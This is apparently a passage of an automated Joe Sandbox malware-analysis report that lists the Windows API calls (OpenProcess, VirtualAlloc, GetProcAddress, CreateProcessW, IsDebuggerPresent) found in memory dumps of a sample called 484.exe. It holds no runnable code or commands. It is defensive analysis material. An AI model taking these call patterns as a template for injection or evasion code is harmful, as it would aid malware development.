    • HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 00421C8C
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • __amsg_exit.LIBCMT ref: 00421CAC
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(?), ref: 00421CD9
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
    • InterlockedIncrement.KERNEL32(00182960), ref: 00421D04
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 00421C8C
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • __amsg_exit.LIBCMT ref: 00421CAC
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(?), ref: 00421CD9
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    • InterlockedIncrement.KERNEL32(00432C08), ref: 00421D04
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00435780,00000008,004213D5,00000000,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000), ref: 004212DE
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD
    • InterlockedIncrement.KERNEL32(?), ref: 0042131F
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(00000000), ref: 00422191
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 0042219E
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221AB
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221B8
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221C5
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221E1
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221F1
      • Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 00422207
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __alloca_probe_16.NTDLLP ref: 00425332
    • __alloca_probe_16.NTDLLP ref: 004253EC
      • Part of subcall function 0042BB4E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0042BB93
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?), ref: 0042544F
    • __freea.LIBCMT ref: 00425459
    • __freea.LIBCMT ref: 00425462
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C5DD
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C5EA
    • _strlen.LIBCMT ref: 0042C69D
    • _strlen.LIBCMT ref: 0042C731
    • _TestDefaultLanguage.LIBCMT ref: 0042C760
      • Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
      • Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
      • Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • __expandlocale.LIBCMT ref: 004276A8
      • Part of subcall function 00426FA8: __getptd.LIBCMT ref: 00426FDE
      • Part of subcall function 00426FA8: _strlen.LIBCMT ref: 00427084
      • Part of subcall function 00427503: __getptd.LIBCMT ref: 004271F1
      • Part of subcall function 00427503: __expandlocale.LIBCMT ref: 00427219
      • Part of subcall function 00427503: _strlen.LIBCMT ref: 0042725B
      • Part of subcall function 00427503: ___crtGetStringTypeA.LIBCMT ref: 004273E1
      • Part of subcall function 00427503: _memcmp.LIBCMT ref: 00427414
      • Part of subcall function 00427503: InterlockedDecrement.KERNEL32 ref: 004274B7
      • Part of subcall function 00427503: _strpbrk.LIBCMT ref: 00427584
      • Part of subcall function 00427503: _strncmp.LIBCMT ref: 004275C7
      • Part of subcall function 00427503: _strlen.LIBCMT ref: 004275D5
      • Part of subcall function 00427503: _strcspn.LIBCMT ref: 004275FB
      • Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(?), ref: 00426F0F
      • Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(?), ref: 00426F26
      • Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(00000000), ref: 00426F6F
      • Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(00000000), ref: 00426F86
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
      • Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
      • Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
      • Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
      • Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
      • Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
      • Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00407C57
      • Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407C5A
      • Part of subcall function 00407C11: GetShellWindow.USER32 ref: 00407C6F
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407CF0
      • Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407CF3
      • Part of subcall function 00407C11: GetProcessWindowStation.USER32 ref: 00407D08
      • Part of subcall function 00407C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D47
      • Part of subcall function 00407C11: GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00407D70
      • Part of subcall function 00407C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D86
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407DED
      • Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407DF0
      • Part of subcall function 00407C11: GetProcessWindowStation.USER32 ref: 00407E02
      • Part of subcall function 00407C11: GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00407E31
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00407E3F
      • Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00407E42
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00407E89
      • Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407E8C
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00407EA4
      • Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407EA7
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00408065
      • Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 0040806C
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0040807F
      • Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00408082
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 004080B5
      • Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 004080BE
      • Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 004080C3
      • Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 004080C6
    • VirtualAlloc.KERNEL32(00000000,76E6FE8D,00003000,00000004,00000000,00000008,76E6FE8D,?,004081EC,00000000,00000008,76E6FE8D), ref: 004084DD
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408518
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408528
    • lstrcmpiA.KERNEL32(?,?), ref: 00408562
    • lstrcmpiA.KERNEL32(?,?), ref: 00408585
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 004085D1
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD
    • DecodePointer.KERNEL32(00435760,00000020,004207BD,00000000,00000001,00000000,?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206A0
    • DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206B1
      • Part of subcall function 0042120D: EncodePointer.KERNEL32(00000000,00424877,00435AB0,00000314,00000000,?,?,?,?,?,00420961,00435AB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042120F
    • DecodePointer.KERNEL32(-00000004,?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206D7
    • DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206EA
    • DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206F4
      • Part of subcall function 00423DC2: LeaveCriticalSection.KERNEL32(?,00423EB1,0000000A,00423EA1,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00423DD1
      • Part of subcall function 004204C1: ExitProcess.KERNEL32 ref: 004204D2
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CFBF
    • ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0040CFE2
    • ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0040D035
    • CloseHandle.KERNEL32(00000000), ref: 0040D043
      • Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
      • Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
      • Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
      • Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
      • Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
      • Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA
    • Sleep.KERNEL32(000003E8,?,00000000), ref: 0040D064
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00404D9C
    • GetCurrentProcess.KERNEL32 ref: 00404DE5
      • Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000008,00000010), ref: 00404C65
      • Part of subcall function 00404C1F: HeapAlloc.KERNEL32(00000000), ref: 00404C68
      • Part of subcall function 00404C1F: GetMessageTime.USER32 ref: 00404C7D
      • Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404CD4
      • Part of subcall function 00404C1F: HeapAlloc.KERNEL32(00000000), ref: 00404CD7
      • Part of subcall function 00404C1F: IsSystemResumeAutomatic.KERNEL32 ref: 00404CEB
      • Part of subcall function 00404C1F: GetModuleHandleA.KERNEL32(00000000,?), ref: 00404D1C
      • Part of subcall function 00404C1F: GetProcAddress.KERNEL32(00000000), ref: 00404D23
      • Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404D4F
      • Part of subcall function 00404C1F: HeapFree.KERNEL32(00000000), ref: 00404D5C
      • Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000000,?), ref: 00404D61
      • Part of subcall function 00404C1F: HeapFree.KERNEL32(00000000), ref: 00404D68
      • Part of subcall function 00409240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263
      • Part of subcall function 00409240: CloseHandle.KERNEL32(00000000), ref: 004093F9
    • Sleep.KERNEL32(00000032), ref: 00404E22
    • CloseHandle.KERNEL32(?), ref: 00404E38
    • CloseHandle.KERNEL32(?), ref: 00404E3E
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 0042472C
    • DecodePointer.KERNEL32(?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 00424739
      • Part of subcall function 0042BADC: HeapSize.KERNEL32(00000000,00000000,?,00424757,00000000,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?), ref: 0042BB07
      • Part of subcall function 00424CD1: Sleep.KERNEL32(00000000,00000000,00000000,?,00424791,00000000,00000010,?,?,?,?,?,0042481B,?,00435910,0000000C), ref: 00424CFB
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 0042479E
    • EncodePointer.KERNEL32(?,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 004247B2
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 004247BA
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004219C6
    • GetCurrentProcessId.KERNEL32 ref: 004219D2
    • GetCurrentThreadId.KERNEL32 ref: 004219DA
    • GetTickCount.KERNEL32 ref: 004219E2
    • QueryPerformanceCounter.KERNEL32(?), ref: 004219EE
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004219C6
    • GetCurrentProcessId.KERNEL32 ref: 004219D2
    • GetCurrentThreadId.KERNEL32 ref: 004219DA
    • GetTickCount.KERNEL32 ref: 004219E2
    • QueryPerformanceCounter.KERNEL32(?), ref: 004219EE
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
    • _wparse_cmdline.LIBCMT ref: 00420E6D
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61
    • _wparse_cmdline.LIBCMT ref: 00420EAF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
    • _wparse_cmdline.LIBCMT ref: 00420E6D
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61
    • _wparse_cmdline.LIBCMT ref: 00420EAF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • wsprintfW.USER32 ref: 00406C4D
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406C6B
    • CloseHandle.KERNEL32(00000000), ref: 00406C7A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00434124,00435780,00000008,004213D5,00000000,00000000,?,0042085F,00000003), ref: 004212DE
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • InterlockedIncrement.KERNEL32(004327E0), ref: 0042131F
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,004204CE,00000000,?,0042BB7D,000000FF,0000001E,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000), ref: 004204A0
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004204CE,00000000,?,0042BB7D,000000FF,0000001E,00000001,00000000,00000000,?,00424C51,00000000,00000001), ref: 004204B0
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
    • HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
    • GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
    • HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00421D24: GetOEMCP.KERNEL32 ref: 00421D4D
      • Part of subcall function 00421D24: GetACP.KERNEL32 ref: 00421D70
    • IsValidCodePage.KERNEL32(-00000030), ref: 00421E13
    • GetCPInfo.KERNEL32(00000000,?), ref: 00421E26
    • setSBUpLow.LIBCMT ref: 00421F14
      • Part of subcall function 00421AF0: GetCPInfo.KERNEL32(?,?), ref: 00421B11
      • Part of subcall function 00421AF0: ___crtGetStringTypeA.LIBCMT ref: 00421B8E
      • Part of subcall function 00421AF0: ___crtLCMapStringA.LIBCMT ref: 00421BAE
      • Part of subcall function 00421AF0: ___crtLCMapStringA.LIBCMT ref: 00421BD3
    • setSBCS.LIBCMT ref: 00421DCD
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
